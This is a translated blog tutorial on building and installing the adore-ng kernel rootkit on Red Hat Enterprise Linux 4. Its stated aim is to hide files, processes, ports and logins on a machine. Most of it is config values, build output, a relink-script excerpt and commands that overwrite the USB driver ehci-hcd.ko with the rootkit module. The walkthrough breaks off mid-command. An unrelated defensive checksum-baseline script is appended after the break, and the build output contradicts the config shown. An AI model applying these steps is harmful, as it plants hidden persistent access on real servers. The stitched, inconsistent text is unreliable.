Published: 2014-09-05 17:36:52  Posted by: 知识屋
Author: baoz
An article I wrote a long time ago, reposting it here. Strange thing: when I tested back then I could hide ports, but now when I try again the ports won't hide. The answer will come out soon :)
Found the cause. The original, untouched version is the one that works: if you hit a similar problem use the original release, and if you want to know where the problem is, diff it yourself.
Preface:
Kernel 2.6 has marched into the Linux world, so those who write backdoors and those who use them have to keep up.
Abbreviations:
fc: Fedora Core
rh: Red Hat
rhel4: Red Hat Enterprise Linux 4
sk: SucKIT
adore: adore-ng
rk: rootkit
lkm: loadable kernel module
What is adore-ng?
An LKM rootkit; googling "adore" turns up plenty of detailed write-ups.
Why choose it?
1. I couldn't get hold of an sk for 2.6.
2. Since FC2, Red Hat kernels disable kmem (/dev/kmem) by default, so sk cannot inject itself into the running kernel on the fly; at the same time many rootkit checkers stop working :)
3. adore was written by Stealth, has a long history and has been tested by a great many people, so it should be more stable than other LKMs. An LKM's stability directly affects the stability of the whole system, so we have to be careful in picking one: no matter how powerful it is, if it hangs the box the moment you play with it and gets you noticed, it wasn't worth it.
Let's look at the features:
[root@RHEL4 adore-ng]# cat FEATURES
If you never used adore before, here's a list of supported
things:
o runs on kernel 2.4.x UP and SMP systems
o runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
o file and directory hiding
o process hiding
o socket-hiding (no matter whether LISTENing, CONNECTED etc)
o full-capability back door
o does not utilize sys_call_table but VFS layer
o KISS principle, to have as less things in there as possible
but also being as much powerful as possible
o hides itself from /proc and /sys filesystems
o syslog filtering: logs generated by hidden processes never appear
on the syslog UNIX socket anymore
o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes
do not appear in the file, except you force it by using special hidden
AND authenticated process (a sshd back door is usually only hidden thus
xtmp entries written by sshd don't make it to disk)
o (optional) relinking of LKMs as described in phrack #61 aka LKM infection
to make it possible to be automatically reloaded after reboots (2.4 and 2.6)
Environment for this article:
A real machine, not a VM.
[root@RHEL4 adore-ng]# uname -a; cat /etc/redhat-release
Linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/Linux
Red Hat Enterprise Linux AS release 4 (Nahant)
Download:
google adore-ng
or look around on 素包子's site, http://baoz.net.
Editing and building:
[root@RHEL4 adore-ng]# mv Makefile.2.6 Makefile
Then edit the following entries.
EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
EXTRA_CFLAGS+=-DCURRENT_ADORE=54
EXTRA_CFLAGS+=-DADORE_KEY="fgjgggfd"
ELITE_UID and ELITE_GID are the "magic" owner id values adore compares against 32-bit uid_t/gid_t fields, so on i686 pick values no larger than 4294967295. A larger value produces the "integer constant is too large" and "comparison is always false" warnings seen in the build output below, which means the constant was silently truncated and the check guarded by it can never match.
These are the TCP ports to hide; leave the trailing 0 alone, it terminates the list.
u_short HIDDEN_SERVICES[] =
{2222, 7350, 0};
If your machine is SMP, enable the following.
EXTRA_CFLAGS+=-D__SMP__
Set the location of your kernel source.
KERNEL_SOURCE=/usr/src/linux
OK, save, exit, and make.
[root@RHEL4 adore-ng]# make
cc -DELITE_UID=2648745389U -DELITE_GID=6063589279U -DCURRENT_ADORE=54 -DADORE_KEY="djksdfnvn" -DHIDE ava.c libinvisible.c -o ava
ava.c:47: warning: integer constant is too large for "unsigned long" type
ava.c:47: warning: large integer implicitly truncated to unsigned type
libinvisible.c: In function `adore_hidefile':
libinvisible.c:76: warning: integer constant is too large for "unsigned long" type
libinvisible.c:76: warning: large integer implicitly truncated to unsigned type
make -C /usr/src/linux SUBDIRS=`pwd` modules
make[1]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686'
CC [M] /root/adore-ng/adore-ng-2.6.o
/root/adore-ng/adore-ng-2.6.c:56: warning: `MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:59: warning: `MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:61: warning: `MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c: In function `adore_opt_filldir':
/root/adore-ng/adore-ng-2.6.c:281: warning: integer constant is too large for "unsigned long" type
/root/adore-ng/adore-ng-2.6.c:281: warning: comparison is always false due to limited range of data type
/root/adore-ng/adore-ng-2.6.c: In function `adore_root_filldir':
/root/adore-ng/adore-ng-2.6.c:363: warning: integer constant is too large for "unsigned long" type
/root/adore-ng/adore-ng-2.6.c:363: warning: comparison is always false due to limited range of data type
Building modules, stage 2.
MODPOST
CC /root/adore-ng/adore-ng-2.6.mod.o
LD [M] /root/adore-ng/adore-ng-2.6.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686'
cc -O2 symsed.c -o symsed
A word about relink, the feature that splices adore into another module. This excerpt from the relink script shows what it does: copy the target module, run symsed over the copy, merge adore-ng-2.6.ko and the copy into a single object z.ko with a relocatable link (ld -r), and optionally copy z.ko back over the original module so adore is loaded again whenever that module is.
system("cp $lkm_path t.ko");
system("./symsed t.ko zero;ld -r adore-ng-2.6.ko t.ko -o z.ko; rm -f t.ko");
print "\nCopy trojaned LKM back to original LKM? (y/n)\n";
while ($yn !~ /^(y|n)$/i) {
    $yn = <STDIN>;
    $yn =~ s/\n//;
}
if ($yn =~ /y/i) {
    system("cp z.ko $lkm_path");
} else {
    print "\nOutput LKM is z.ko\n";
}
On RHEL4 the spliced module would not load at all, but no matter: instead of splicing, we replace :)
Very few people run modprobe -r after installing a system, so it is easy to replace a module the system doesn't really need. Let's look at the modules on my box:
[root@RHEL4 adore-ng]# lsmod
Module                  Size  Used by
dm_mod                 54741  0
ohci_hcd               21713  0
snd_intel8x0           33769  0
snd_ac97_codec         63889  1 snd_intel8x0
snd_pcm_oss            49017  0
snd_mixer_oss          17985  1 snd_pcm_oss
snd_pcm                96841  2 snd_intel8x0,snd_pcm_oss
snd_timer              29893  1 snd_pcm
snd_page_alloc          9673  2 snd_intel8x0,snd_pcm
snd_mpu401_uart         8769  1 snd_intel8x0
snd_rawmidi            26597  1 snd_mpu401_uart
snd_seq_device          8137  1 snd_rawmidi
snd                    54949  9 snd_intel8x0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device
soundcore               9889  1 snd
sis900                 18756  0
ext3                  116809  1
jbd                    71257  1 ext3
Pick a module whose "Used by" count is 0 and that is rarely used, for example a USB driver, heh.
ehci_hcd is missing from the list because I already used it; ohci_hcd or the sound-card modules would do just as well.
See where it lives:
[root@RHEL4 adore-ng]# modprobe -l | grep ehci
/lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
Unload it:
[root@RHEL4 adore-ng]# modprobe -r ehci-hcd
Replace it:
[root@RHEL4 adore-ng]# cp adore-ng-2.6.ko /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
Load it:
[root@RHEL4 adore-ng]# modprob
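The check a defender wants against exactly this trick is a baseline of the on-disk module tree: a driver overwritten with cp keeps its name and path but not its checksum, and lsmod is no help once the module is loaded, since adore-ng hides itself from /proc and /sys (see FEATURES above). The following is an added example, not code from the original post or from adore-ng. The module tree, file names and file contents it builds are constructed for the demo; on a real host you would run module_baseline against /lib/modules/$(uname -r) from trusted media (or use rpm -V kernel, which compares the kernel package's files with the RPM database) and keep the manifest off the box.

```sh
#!/bin/sh
# Added example (not part of the original post or of adore-ng):
# baseline-and-compare check for kernel modules on disk.
# All paths and file contents used by demo_run are constructed for the demo.

# module_baseline <module_dir> <manifest>
# Writes one "crc size path" line per .ko under module_dir. cksum is POSIX;
# sha256sum is stronger where available and the rest of the logic is the same.
module_baseline() {
    find "$1" -type f -name '*.ko' | sort | while read -r f; do
        cksum "$f"
    done > "$2"
}

# module_compare <module_dir> <manifest>
# Prints CHANGED/MISSING/NEW lines and returns 1 if the tree differs from
# the baseline in any way, 0 if it is clean.
module_compare() {
    dir=$1; manifest=$2
    report=$(
        # every baselined module must still exist with the same checksum
        while read -r crc size path; do
            if [ ! -f "$path" ]; then
                echo "MISSING $path"
            elif [ "$(cksum "$path")" != "$crc $size $path" ]; then
                echo "CHANGED $path"
            fi
        done < "$manifest"
        # a .ko that was not in the baseline needs explaining too
        find "$dir" -type f -name '*.ko' | sort | while read -r path; do
            awk -v p="$path" '$3 == p { found = 1 } END { exit !found }' "$manifest" \
                || echo "NEW $path"
        done
    )
    [ -z "$report" ] && return 0
    printf '%s\n' "$report"
    return 1
}

# demo_run: build a constructed module tree, baseline it, then overwrite
# ehci-hcd.ko the way the post does and confirm the change is reported.
# Returns 0 if the check behaves as expected, 1 otherwise.
demo_run() {
    tree=$(mktemp -d)
    mkdir -p "$tree/kernel/drivers/usb/host"
    printf 'fake ehci-hcd module bytes\n' > "$tree/kernel/drivers/usb/host/ehci-hcd.ko"
    printf 'fake ohci-hcd module bytes\n' > "$tree/kernel/drivers/usb/host/ohci-hcd.ko"
    manifest="$tree/modules.baseline"      # in practice: store this off the host
    module_baseline "$tree" "$manifest"

    # an untouched tree must pass
    module_compare "$tree" "$manifest" >/dev/null || { rm -rf "$tree"; return 1; }

    # the move from the post: copy the rootkit over a rarely used driver
    printf 'stand-in for adore-ng-2.6.ko\n' > "$tree/kernel/drivers/usb/host/ehci-hcd.ko"
    out=$(module_compare "$tree" "$manifest" || true)
    rm -rf "$tree"
    case "$out" in
        *"CHANGED $tree/kernel/drivers/usb/host/ehci-hcd.ko"*) return 0 ;;
        *) return 1 ;;
    esac
}
```

modinfo on the suspect file is a quicker spot check, since it prints the fields the module was actually built with rather than what the file name suggests, but only a baseline taken before the compromise tells you which files changed.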